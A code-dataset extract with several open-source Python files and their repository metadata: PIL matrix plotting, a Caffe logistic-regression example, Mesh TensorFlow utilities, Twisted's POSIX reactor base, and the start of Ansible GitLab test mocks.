cutoff Threshold value for printing an element (default 0.1)
do_outline Whether or not to print an outline around the block (default 0)
height The height of the image (default 300)
width The width of the image (default 300)
Example:
>>> from Numeric import identity,Float
>>> a = identity(10,Float)
>>> spy_matrix_pil(a)
"""
import Image,ImageDraw
img = Image.new("RGB",(width,height),(255,255,255))
draw = ImageDraw.Draw(img)
n,m = A.shape
if n>width or m>height:
raise "Rectangle too big %d %d %d %d" % (n,m,width,height)
for i in range(n):
xmin = width*i/float(n)
xmax = width*(i+1)/float(n)
for j in range(m):
ymin = height*j/float(m)
ymax = height*(j+1)/float(m)
if abs(A[i,j]) > cutoff:
if do_outline:
draw.rectangle((xmin,ymin,xmax,ymax),fill=(0,0,255),
outline=(0,0,0))
else:
draw.rectangle((xmin,ymin,xmax,ymax),fill=(0,0,255))
img.save(fname)
return
def pcolor_matrix_pil(A,fname='tmp.png',do_outline=0,
height=300,width=300):
"""\
Use a matlab-like 'pcolor' function to display the large elements
of a matrix using the Python Imaging Library.
Arguments:
A Input Numpy matrix
fname Output filename to which to dump the graphics (default 'tmp.png')
do_outline Whether or not to print an outline around the block (default 0)
height The height of the image (default 300)
width The width of the image (default 300)
Example:
>>> from Numeric import identity,Float
>>> a = identity(10,Float)
>>> pcolor_matrix_pil(a)
"""
import Image,ImageDraw
img = Image.new("RGB",(width,height),(255,255,255))
draw = ImageDraw.Draw(img)
mina = min(min(A))
maxa = max(max(A))
n,m = A.shape
if n>width or m>height:
raise "Rectangle too big %d %d %d %d" % (n,m,width,height)
for i in range(n):
xmin = width*i/float(n)
xmax = width*(i+1)/float(n)
for j in range(m):
ymin = height*j/float(m)
ymax = height*(j+1)/float(m)
color = get_color(A[i,j],mina,maxa)
if do_outline:
draw.rectangle((xmin,ymin,xmax,ymax),fill=color,
outline=(0,0,0))
else:
draw.rectangle((xmin,ymin,xmax,ymax),fill=color)
img.save(fname)
return
def get_color(a,cmin,cmax):
"""\
Convert a float value to one of a continuous range of colors.
Rewritten to use recipe 9.10 from the Python Cookbook.
"""
import math
try: a = float(a-cmin)/(cmax-cmin)
except ZeroDivisionError: a=0.5 # cmax == cmin
blue = min((max((4*(0.75-a),0.)),1.))
red = min((max((4*(a-0.25),0.)),1.))
green = min((max((4*math.fabs(a-0.5)-1.,0)),1.))
return '#%1x%1x%1x' % (int(15*red),int(15*green),int(15*blue))
from Numeric import identity,Float
a = identity(10,Float)
spy_matrix_pil(a)
pcolor_matrix_pil(a,'tmp2.png')
| [
"betty@qburst.com"
] | betty@qburst.com |
9166bba17e84a36d0e3627b66fc47d717a04d0ec | d3a8892f7e8a9d7767b3d797b0274004bf53e109 | /caffe/examples/notebook/original/brewing-logreg.py | 288d437ed475c854b70fc17a5e97ba4a9b78cde9 | [
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | QI1002/machinelearning | 27d3217430c3440fce81f42e70aa88762dd9529c | 8daa4a54a5010ec702cb56b56f6373f5f09c891b | refs/heads/master | 2020-05-23T12:44:09.767397 | 2019-05-15T12:36:06 | 2019-05-15T12:36:06 | 186,762,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,606 | py | # based on Ipython Notebook script in https://github.com/QI1002/caffe/blob/master/examples/brewing-logreg.ipynb
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
import os
os.chdir('..')
import sys
sys.path.insert(0, './python')
import caffe
import os
import h5py
import shutil
import tempfile
import sklearn
import sklearn.datasets
import sklearn.linear_model
import pandas as pd
X, y = sklearn.datasets.make_classification(
n_samples=10000, n_features=4, n_redundant=0, n_informative=2,
n_clusters_per_class=2, hypercube=False, random_state=0
)
# Split into train and test
X, Xt, y, yt = sklearn.cross_validation.train_test_split(X, y)
# Visualize sample of the data
ind = np.random.permutation(X.shape[0])[:1000]
df = pd.DataFrame(X[ind])
_ = pd.scatter_matrix(df, figsize=(9, 9), diagonal='kde', marker='o', s=40, alpha=.4, c=y[ind])
%%timeit
# Train and test the scikit-learn SGD logistic regression.
clf = sklearn.linear_model.SGDClassifier(
loss='log', n_iter=1000, penalty='l2', alpha=5e-4, class_weight='auto')
clf.fit(X, y)
yt_pred = clf.predict(Xt)
print('Accuracy: {:.3f}'.format(sklearn.metrics.accuracy_score(yt, yt_pred)))
# Write out the data to HDF5 files in a temp directory.
# This file is assumed to be caffe_root/examples/hdf5_classification.ipynb
dirname = os.path.abspath('./examples/hdf5_classification/data')
if not os.path.exists(dirname):
os.makedirs(dirname)
train_filename = os.path.join(dirname, 'train.h5')
test_filename = os.path.join(dirname, 'test.h5')
# HDF5DataLayer source should be a file containing a list of HDF5 filenames.
# To show this off, we'll list the same data file twice.
with h5py.File(train_filename, 'w') as f:
f['data'] = X
f['label'] = y.astype(np.float32)
with open(os.path.join(dirname, 'train.txt'), 'w') as f:
f.write(train_filename + '\n')
f.write(train_filename + '\n')
# HDF5 is pretty efficient, but can be further compressed.
comp_kwargs = {'compression': 'gzip', 'compression_opts': 1}
with h5py.File(test_filename, 'w') as f:
f.create_dataset('data', data=Xt, **comp_kwargs)
f.create_dataset('label', data=yt.astype(np.float32), **comp_kwargs)
with open(os.path.join(dirname, 'test.txt'), 'w') as f:
f.write(test_filename + '\n')
from caffe import layers as L
from caffe import params as P
def logreg(hdf5, batch_size):
# logistic regression: data, matrix multiplication, and 2-class softmax loss
n = caffe.NetSpec()
n.data, n.label = L.HDF5Data(batch_size=batch_size, source=hdf5, ntop=2)
n.ip1 = L.InnerProduct(n.data, num_output=2, weight_filler=dict(type='xavier'))
n.accuracy = L.Accuracy(n.ip1, n.label)
n.loss = L.SoftmaxWithLoss(n.ip1, n.label)
return n.to_proto()
train_net_path = 'examples/hdf5_classification/logreg_auto_train.prototxt'
with open(train_net_path, 'w') as f:
f.write(str(logreg('examples/hdf5_classification/data/train.txt', 10)))
test_net_path = 'examples/hdf5_classification/logreg_auto_test.prototxt'
with open(test_net_path, 'w') as f:
f.write(str(logreg('examples/hdf5_classification/data/test.txt', 10)))
from caffe.proto import caffe_pb2
def solver(train_net_path, test_net_path):
s = caffe_pb2.SolverParameter()
# Specify locations of the train and test networks.
s.train_net = train_net_path
s.test_net.append(test_net_path)
s.test_interval = 1000 # Test after every 1000 training iterations.
s.test_iter.append(250) # Test 250 "batches" each time we test.
s.max_iter = 10000 # # of times to update the net (training iterations)
# Set the initial learning rate for stochastic gradient descent (SGD).
s.base_lr = 0.01
# Set `lr_policy` to define how the learning rate changes during training.
# Here, we 'step' the learning rate by multiplying it by a factor `gamma`
# every `stepsize` iterations.
s.lr_policy = 'step'
s.gamma = 0.1
s.stepsize = 5000
# Set other optimization parameters. Setting a non-zero `momentum` takes a
# weighted average of the current gradient and previous gradients to make
# learning more stable. L2 weight decay regularizes learning, to help prevent
# the model from overfitting.
s.momentum = 0.9
s.weight_decay = 5e-4
# Display the current training loss and accuracy every 1000 iterations.
s.display = 1000
# Snapshots are files used to store networks we've trained. Here, we'll
# snapshot every 10K iterations -- just once at the end of training.
# For larger networks that take longer to train, you may want to set
# snapshot < max_iter to save the network and training state to disk during
# optimization, preventing disaster in case of machine crashes, etc.
s.snapshot = 10000
s.snapshot_prefix = 'examples/hdf5_classification/data/train'
# We'll train on the CPU for fair benchmarking against scikit-learn.
# Changing to GPU should result in much faster training!
s.solver_mode = caffe_pb2.SolverParameter.CPU
return s
solver_path = 'examples/hdf5_classification/logreg_solver.prototxt'
with open(solver_path, 'w') as f:
f.write(str(solver(train_net_path, test_net_path)))
%%timeit
caffe.set_mode_cpu()
solver = caffe.get_solver(solver_path)
solver.solve()
accuracy = 0
batch_size = solver.test_nets[0].blobs['data'].num
test_iters = int(len(Xt) / batch_size)
for i in range(test_iters):
solver.test_nets[0].forward()
accuracy += solver.test_nets[0].blobs['accuracy'].data
accuracy /= test_iters
print("Accuracy: {:.3f}".format(accuracy))
!./build/tools/caffe train -solver examples/hdf5_classification/logreg_solver.prototxt
from caffe import layers as L
from caffe import params as P
def nonlinear_net(hdf5, batch_size):
# one small nonlinearity, one leap for model kind
n = caffe.NetSpec()
n.data, n.label = L.HDF5Data(batch_size=batch_size, source=hdf5, ntop=2)
# define a hidden layer of dimension 40
n.ip1 = L.InnerProduct(n.data, num_output=40, weight_filler=dict(type='xavier'))
# transform the output through the ReLU (rectified linear) non-linearity
n.relu1 = L.ReLU(n.ip1, in_place=True)
# score the (now non-linear) features
n.ip2 = L.InnerProduct(n.ip1, num_output=2, weight_filler=dict(type='xavier'))
# same accuracy and loss as before
n.accuracy = L.Accuracy(n.ip2, n.label)
n.loss = L.SoftmaxWithLoss(n.ip2, n.label)
return n.to_proto()
train_net_path = 'examples/hdf5_classification/nonlinear_auto_train.prototxt'
with open(train_net_path, 'w') as f:
f.write(str(nonlinear_net('examples/hdf5_classification/data/train.txt', 10)))
test_net_path = 'examples/hdf5_classification/nonlinear_auto_test.prototxt'
with open(test_net_path, 'w') as f:
f.write(str(nonlinear_net('examples/hdf5_classification/data/test.txt', 10)))
solver_path = 'examples/hdf5_classification/nonlinear_logreg_solver.prototxt'
with open(solver_path, 'w') as f:
f.write(str(solver(train_net_path, test_net_path)))
%%timeit
caffe.set_mode_cpu()
solver = caffe.get_solver(solver_path)
solver.solve()
accuracy = 0
batch_size = solver.test_nets[0].blobs['data'].num
test_iters = int(len(Xt) / batch_size)
for i in range(test_iters):
solver.test_nets[0].forward()
accuracy += solver.test_nets[0].blobs['accuracy'].data
accuracy /= test_iters
print("Accuracy: {:.3f}".format(accuracy))
!./build/tools/caffe train -solver examples/hdf5_classification/nonlinear_logreg_solver.prototxt
# Clean up (comment this out if you want to examine the hdf5_classification/data directory).
shutil.rmtree(dirname)
| [
"alanchang544@gmail.com"
] | alanchang544@gmail.com |
832d35a685c7bd0a682533fa880372e0d17ad7b8 | 12ddeca149e1a95aa404d494a8856536c3a7022b | /mesh_tensorflow/utils.py | 8a4fc9aa67c1d2f8b7d8c4e971a75021fe2c75b3 | [
"Apache-2.0"
] | permissive | brettkoonce/mesh | bbe1c2c08aaa4ce50bd91497c122f1a9f252fb27 | 07417c92a061978f5b6ec10af5ebb6aa48de1d7e | refs/heads/master | 2020-04-08T10:29:55.910960 | 2018-11-25T02:31:42 | 2018-11-25T02:32:56 | 159,271,264 | 0 | 0 | null | 2018-11-27T03:35:58 | 2018-11-27T03:35:58 | null | UTF-8 | Python | false | false | 2,209 | py | # coding=utf-8
# Copyright 2018 The Mesh TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities for Mesh TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import heapq
import tensorflow as tf
from tensorflow.python.framework import ops
@contextlib.contextmanager
def outside_all_rewrites():
with ops.control_dependencies(None):
yield
class BalancedVariablePlacer(object):
"""Place the variable on different device and blance the memory usage."""
def __init__(self, devices, init_usage=None):
init_usage = init_usage if init_usage else [0] * len(devices)
assert len(devices) == len(init_usage)
self._mem_device_heap = list(zip(init_usage, devices))
heapq.heapify(self._mem_device_heap)
self._last_device = devices[0]
def device_function(self, var):
"""Choose a device for the input variable.
Args:
var: an Variable.
Returns:
The device for placing the var.
"""
if var.type not in ('Variable', 'VariableV2', 'VarHandleOp'):
tf.logging.debug('Place {} on last device: {}.'.format(
var.name, self._last_device))
return self._last_device
shape = tf.TensorShape(var.get_attr('shape'))
assert shape.num_elements() is not None
size = tf.DType(var.get_attr('dtype')).size
mem, device = heapq.heappop(self._mem_device_heap)
mem += shape.num_elements() * size
heapq.heappush(self._mem_device_heap, (mem, device))
tf.logging.debug('Place variable {} on {} and consumes {} Bytes.'.format(
var.name, device, mem))
self._last_device = device
return device
| [
"copybara-piper@google.com"
] | copybara-piper@google.com |
39b028afb5cae996620b91317e1c4b079eacc147 | 134ff3c0719d4c0022eb0fb7c859bdbff5ca34b2 | /desktop/core/ext-py/Twisted/twisted/internet/posixbase.py | 14e37327623f2c803659a30ddbe5b454c61f25ed | [
"MIT",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | civascu/hue | 22637f13a4cfc557716557661523131b6ac16da4 | 82f2de44789ff5a981ed725175bae7944832d1e9 | refs/heads/master | 2020-03-31T01:50:39.449966 | 2010-07-21T01:05:50 | 2010-07-21T01:07:15 | 788,284 | 0 | 0 | Apache-2.0 | 2019-02-04T07:03:12 | 2010-07-21T07:34:27 | Python | UTF-8 | Python | false | false | 14,189 | py | # -*- test-case-name: twisted.test.test_internet -*-
#
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Posix reactor base class
Maintainer: Itamar Shtull-Trauring
"""
import warnings
import socket
import errno
import os
from zope.interface import implements, classImplements
from twisted.internet.interfaces import IReactorUNIX, IReactorUNIXDatagram
from twisted.internet.interfaces import IReactorTCP, IReactorUDP, IReactorSSL, IReactorArbitrary
from twisted.internet.interfaces import IReactorProcess, IReactorMulticast
from twisted.internet.interfaces import IHalfCloseableDescriptor
from twisted.internet import error
from twisted.internet import tcp, udp
from twisted.python import log, failure, util
from twisted.persisted import styles
from twisted.python.runtime import platformType, platform
from twisted.internet.base import ReactorBase, _SignalReactorMixin
try:
from twisted.internet import ssl
sslEnabled = True
except ImportError:
sslEnabled = False
try:
from twisted.internet import unix
unixEnabled = True
except ImportError:
unixEnabled = False
processEnabled = False
if platformType == 'posix':
from twisted.internet import fdesc
import process
processEnabled = True
if platform.isWindows():
try:
import win32process
processEnabled = True
except ImportError:
win32process = None
class _Win32Waker(log.Logger, styles.Ephemeral):
"""I am a workaround for the lack of pipes on win32.
I am a pair of connected sockets which can wake up the main loop
from another thread.
"""
disconnected = 0
def __init__(self, reactor):
"""Initialize.
"""
self.reactor = reactor
# Following select_trigger (from asyncore)'s example;
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.setsockopt(socket.IPPROTO_TCP, 1, 1)
server.bind(('127.0.0.1', 0))
server.listen(1)
client.connect(server.getsockname())
reader, clientaddr = server.accept()
client.setblocking(0)
reader.setblocking(0)
self.r = reader
self.w = client
self.fileno = self.r.fileno
def wakeUp(self):
"""Send a byte to my connection.
"""
try:
util.untilConcludes(self.w.send, 'x')
except socket.error, (err, msg):
if err != errno.WSAEWOULDBLOCK:
raise
def doRead(self):
"""Read some data from my connection.
"""
try:
self.r.recv(8192)
except socket.error:
pass
def connectionLost(self, reason):
self.r.close()
self.w.close()
self.reactor.waker = None
class _UnixWaker(log.Logger, styles.Ephemeral):
"""This class provides a simple interface to wake up the event loop.
This is used by threads or signals to wake up the event loop.
"""
disconnected = 0
i = None
o = None
def __init__(self, reactor):
"""Initialize.
"""
self.reactor = reactor
self.i, self.o = os.pipe()
fdesc.setNonBlocking(self.i)
fdesc.setNonBlocking(self.o)
self.fileno = lambda: self.i
def doRead(self):
"""Read some bytes from the pipe.
"""
fdesc.readFromFD(self.fileno(), lambda data: None)
def wakeUp(self):
"""Write one byte to the pipe, and flush it.
"""
# We don't use fdesc.writeToFD since we need to distinguish
# between EINTR (try again) and EAGAIN (do nothing).
if self.o is not None:
try:
util.untilConcludes(os.write, self.o, 'x')
except OSError, e:
if e.errno != errno.EAGAIN:
raise
def connectionLost(self, reason):
"""Close both ends of my pipe.
"""
if not hasattr(self, "o"):
return
for fd in self.i, self.o:
try:
os.close(fd)
except IOError:
pass
del self.i, self.o
self.reactor.waker = None
if platformType == 'posix':
_Waker = _UnixWaker
elif platformType == 'win32':
_Waker = _Win32Waker
class PosixReactorBase(_SignalReactorMixin, ReactorBase):
"""
A basis for reactors that use file descriptors.
"""
implements(IReactorArbitrary, IReactorTCP, IReactorUDP, IReactorMulticast)
def __init__(self):
ReactorBase.__init__(self)
if self.usingThreads or platformType == "posix":
self.installWaker()
def _disconnectSelectable(self, selectable, why, isRead, faildict={
error.ConnectionDone: failure.Failure(error.ConnectionDone()),
error.ConnectionLost: failure.Failure(error.ConnectionLost())
}):
"""
Utility function for disconnecting a selectable.
Supports half-close notification, isRead should be boolean indicating
whether error resulted from doRead().
"""
self.removeReader(selectable)
f = faildict.get(why.__class__)
if f:
if (isRead and why.__class__ == error.ConnectionDone
and IHalfCloseableDescriptor.providedBy(selectable)):
selectable.readConnectionLost(f)
else:
self.removeWriter(selectable)
selectable.connectionLost(f)
else:
self.removeWriter(selectable)
selectable.connectionLost(failure.Failure(why))
def installWaker(self):
"""
Install a `waker' to allow threads and signals to wake up the IO thread.
We use the self-pipe trick (http://cr.yp.to/docs/selfpipe.html) to wake
the reactor. On Windows we use a pair of sockets.
"""
if not self.waker:
self.waker = _Waker(self)
self.addReader(self.waker)
# IReactorProcess
def spawnProcess(self, processProtocol, executable, args=(),
env={}, path=None,
uid=None, gid=None, usePTY=0, childFDs=None):
args, env = self._checkProcessArgs(args, env)
if platformType == 'posix':
if usePTY:
if childFDs is not None:
raise ValueError("Using childFDs is not supported with usePTY=True.")
return process.PTYProcess(self, executable, args, env, path,
processProtocol, uid, gid, usePTY)
else:
return process.Process(self, executable, args, env, path,
processProtocol, uid, gid, childFDs)
elif platformType == "win32":
if uid is not None or gid is not None:
raise ValueError("The uid and gid parameters are not supported on Windows.")
if usePTY:
raise ValueError("The usePTY parameter is not supported on Windows.")
if childFDs:
raise ValueError("Customizing childFDs is not supported on Windows.")
if win32process:
from twisted.internet._dumbwin32proc import Process
return Process(self, processProtocol, executable, args, env, path)
else:
raise NotImplementedError, "spawnProcess not available since pywin32 is not installed."
else:
raise NotImplementedError, "spawnProcess only available on Windows or POSIX."
# IReactorUDP
def listenUDP(self, port, protocol, interface='', maxPacketSize=8192):
"""Connects a given L{DatagramProtocol} to the given numeric UDP port.
@returns: object conforming to L{IListeningPort}.
"""
p = udp.Port(port, protocol, interface, maxPacketSize, self)
p.startListening()
return p
def connectUDP(self, remotehost, remoteport, protocol, localport=0,
interface='', maxPacketSize=8192):
"""DEPRECATED.
Connects a L{ConnectedDatagramProtocol} instance to a UDP port.
"""
warnings.warn("use listenUDP and then transport.connect().", DeprecationWarning, stacklevel=2)
p = udp.ConnectedPort((remotehost, remoteport), localport, protocol, interface, maxPacketSize, self)
p.startListening()
return p
# IReactorMulticast
def listenMulticast(self, port, protocol, interface='', maxPacketSize=8192, listenMultiple=False):
"""Connects a given DatagramProtocol to the given numeric UDP port.
EXPERIMENTAL.
@returns: object conforming to IListeningPort.
"""
p = udp.MulticastPort(port, protocol, interface, maxPacketSize, self, listenMultiple)
p.startListening()
return p
# IReactorUNIX
def connectUNIX(self, address, factory, timeout=30, checkPID=0):
"""@see: twisted.internet.interfaces.IReactorUNIX.connectUNIX
"""
assert unixEnabled, "UNIX support is not present"
c = unix.Connector(address, factory, timeout, self, checkPID)
c.connect()
return c
_unspecified = object()
def _checkMode(self, name, mode):
"""
Check C{mode} to see if a value was specified for it and emit a
deprecation warning if so. Return the default value if none was
specified, otherwise return C{mode}.
"""
if mode is not self._unspecified:
warnings.warn(
'The mode parameter of %(name)s will be removed. Do not pass '
'a value for it. Set permissions on the containing directory '
'before calling %(name)s, instead.' % dict(name=name),
category=DeprecationWarning,
stacklevel=3)
else:
mode = 0666
return mode
def listenUNIX(self, address, factory, backlog=50, mode=_unspecified,
wantPID=0):
"""
@see: twisted.internet.interfaces.IReactorUNIX.listenUNIX
"""
assert unixEnabled, "UNIX support is not present"
mode = self._checkMode('IReactorUNIX.listenUNIX', mode)
p = unix.Port(address, factory, backlog, mode, self, wantPID)
p.startListening()
return p
# IReactorUNIXDatagram
def listenUNIXDatagram(self, address, protocol, maxPacketSize=8192,
mode=_unspecified):
"""
Connects a given L{DatagramProtocol} to the given path.
EXPERIMENTAL.
@returns: object conforming to L{IListeningPort}.
"""
assert unixEnabled, "UNIX support is not present"
mode = self._checkMode('IReactorUNIXDatagram.listenUNIXDatagram', mode)
p = unix.DatagramPort(address, protocol, maxPacketSize, mode, self)
p.startListening()
return p
def connectUNIXDatagram(self, address, protocol, maxPacketSize=8192,
mode=_unspecified, bindAddress=None):
"""
Connects a L{ConnectedDatagramProtocol} instance to a path.
EXPERIMENTAL.
"""
assert unixEnabled, "UNIX support is not present"
mopde = self._checkMode('IReactorUNIXDatagram.connectUNIXDatagram', mode)
p = unix.ConnectedDatagramPort(address, protocol, maxPacketSize, mode, bindAddress, self)
p.startListening()
return p
# IReactorTCP
def listenTCP(self, port, factory, backlog=50, interface=''):
"""@see: twisted.internet.interfaces.IReactorTCP.listenTCP
"""
p = tcp.Port(port, factory, backlog, interface, self)
p.startListening()
return p
def connectTCP(self, host, port, factory, timeout=30, bindAddress=None):
"""@see: twisted.internet.interfaces.IReactorTCP.connectTCP
"""
c = tcp.Connector(host, port, factory, timeout, bindAddress, self)
c.connect()
return c
# IReactorSSL (sometimes, not implemented)
def connectSSL(self, host, port, factory, contextFactory, timeout=30, bindAddress=None):
"""@see: twisted.internet.interfaces.IReactorSSL.connectSSL
"""
assert sslEnabled, "SSL support is not present"
c = ssl.Connector(host, port, factory, contextFactory, timeout, bindAddress, self)
c.connect()
return c
def listenSSL(self, port, factory, contextFactory, backlog=50, interface=''):
"""@see: twisted.internet.interfaces.IReactorSSL.listenSSL
"""
assert sslEnabled, "SSL support is not present"
p = ssl.Port(port, factory, contextFactory, backlog, interface, self)
p.startListening()
return p
# IReactorArbitrary
def listenWith(self, portType, *args, **kw):
kw['reactor'] = self
p = portType(*args, **kw)
p.startListening()
return p
def connectWith(self, connectorType, *args, **kw):
kw['reactor'] = self
c = connectorType(*args, **kw)
c.connect()
return c
def _removeAll(self, readers, writers):
"""
Remove all readers and writers, and return list of Selectables.
Meant for calling from subclasses, to implement removeAll, like::
def removeAll(self):
return self._removeAll(reads, writes)
where C{reads} and C{writes} are iterables.
"""
readers = [reader for reader in readers if
reader is not self.waker]
readers_dict = {}
for reader in readers:
readers_dict[reader] = 1
for reader in readers:
self.removeReader(reader)
self.removeWriter(reader)
writers = [writer for writer in writers if
writer not in readers_dict]
for writer in writers:
self.removeWriter(writer)
return readers+writers
if sslEnabled:
classImplements(PosixReactorBase, IReactorSSL)
if unixEnabled:
classImplements(PosixReactorBase, IReactorUNIX, IReactorUNIXDatagram)
if processEnabled:
classImplements(PosixReactorBase, IReactorProcess)
__all__ = ["PosixReactorBase"]
| [
"bcwalrus@cloudera.com"
] | bcwalrus@cloudera.com |
4493d66c4308273818a2e1583c59b19d6f86fb1e | 26bd175ffb3bd204db5bcb70eec2e3dfd55fbe9f | /exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/source_control/gitlab/gitlab.py | 5a6bc0ea58a494099c0c7001e41e5d0c095d80c1 | [
"GPL-3.0-only",
"MIT",
"CC0-1.0",
"GPL-1.0-or-later"
] | permissive | tr3ck3r/linklight | 37814ed19173d893cdff161355d70a1cf538239b | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | refs/heads/master | 2021-04-11T04:33:02.727318 | 2020-03-25T17:38:41 | 2020-03-25T17:38:41 | 248,992,437 | 0 | 0 | MIT | 2020-03-21T14:26:25 | 2020-03-21T14:26:25 | null | UTF-8 | Python | false | false | 30,288 | py | # -*- coding: utf-8 -*-
# Copyright: (c) 2019, Guillaume Martinez (lunik@tiwabbit.fr)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import
import sys
from httmock import response # noqa
from httmock import urlmatch # noqa
from ansible_collections.community.general.tests.unit.compat import unittest
from gitlab import Gitlab
class FakeAnsibleModule(object):
def __init__(self):
self.check_mode = False
def fail_json(self, **args):
pass
def exit_json(self, **args):
pass
class GitlabModuleTestCase(unittest.TestCase):
def setUp(self):
unitest_python_version_check_requirement(self)
self.mock_module = FakeAnsibleModule()
self.gitlab_instance = Gitlab("http://localhost", private_token="private_token", api_version=4)
# Python 2.7+ is needed for python-gitlab
GITLAB_MINIMUM_PYTHON_VERSION = (2, 7)
# Verify if the current Python version is higher than GITLAB_MINIMUM_PYTHON_VERSION
def python_version_match_requirement():
return sys.version_info >= GITLAB_MINIMUM_PYTHON_VERSION
# Skip unittest test case if python version don't match requirement
def unitest_python_version_check_requirement(unittest_testcase):
if not python_version_match_requirement():
unittest_testcase.skipTest("Python %s+ is needed for python-gitlab" % ",".join(map(str, GITLAB_MINIMUM_PYTHON_VERSION)))
'''
USER API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users", method="get")
def resp_find_user(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1, "username": "john_smith", "name": "John Smith", "state": "active",'
'"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
'"web_url": "http://localhost:3000/john_smith"}, {"id": 2,'
'"username": "jack_smith", "name": "Jack Smith", "state": "blocked",'
'"avatar_url": "http://gravatar.com/../e32131cd8.jpeg",'
'"web_url": "http://localhost:3000/jack_smith"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users", method="post")
def resp_create_user(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "username": "john_smith", "name": "John Smith", "state": "active",'
'"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
'"web_url": "http://localhost:3000/john_smith","created_at": "2012-05-23T08:00:58Z",'
'"bio": null, "location": null, "public_email": "john@example.com", "skype": "",'
'"linkedin": "", "twitter": "", "website_url": "", "organization": ""}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="get")
def resp_get_user(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "username": "john_smith", "name": "John Smith",'
'"state": "active",'
'"avatar_url": "http://localhost:3000/uploads/user/avatar/1/cd8.jpeg",'
'"web_url": "http://localhost:3000/john_smith",'
'"created_at": "2012-05-23T08:00:58Z", "bio": null, "location": null,'
'"public_email": "john@example.com", "skype": "", "linkedin": "",'
'"twitter": "", "website_url": "", "organization": "", "is_admin": false}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="get")
def resp_get_missing_user(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(404, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="delete")
def resp_delete_user(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="delete")
def resp_delete_missing_user(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(404, content, headers, None, 5, request)
'''
USER SSHKEY API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1/keys", method="get")
def resp_get_user_keys(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1, "title": "Public key",'
'"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596'
'k6YjzGGphH2TUxwKzxcKDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQa'
'SeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
'"created_at": "2014-08-01T14:47:39.080Z"},{"id": 3,'
'"title": "Another Public key",'
'"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596'
'k6YjzGGphH2TUxwKzxcKDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaS'
'eP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
'"created_at": "2014-08-01T14:47:39.080Z"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1/keys", method="post")
def resp_create_user_keys(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "title": "Private key",'
'"key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDA1YotVDm2mAyk2tPt4E7AHm01sS6JZmcUdRuSuA5z'
'szUJzYPPUSRAX3BCgTqLqYx//UuVncK7YqLVSbbwjKR2Ez5lISgCnVfLVEXzwhv+xawxKWmI7hJ5S0tOv6MJ+Ixy'
'Ta4xcKwJTwB86z22n9fVOQeJTR2dSOH1WJrf0PvRk+KVNY2jTiGHTi9AIjLnyD/jWRpOgtdfkLRc8EzAWrWlgNmH'
'2WOKBw6za0az6XoG75obUdFVdW3qcD0xc809OHLi7FDf+E7U4wiZJCFuUizMeXyuK/SkaE1aee4Qp5R4dxTR4TP9'
'M1XAYkf+kF0W9srZ+mhF069XD/zhUPJsvwEF",'
'"created_at": "2014-08-01T14:47:39.080Z"}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
'''
GROUP API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="get")
def resp_find_group(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1, "name": "Foobar Group", "path": "foo-bar",'
'"description": "An interesting group", "visibility": "public",'
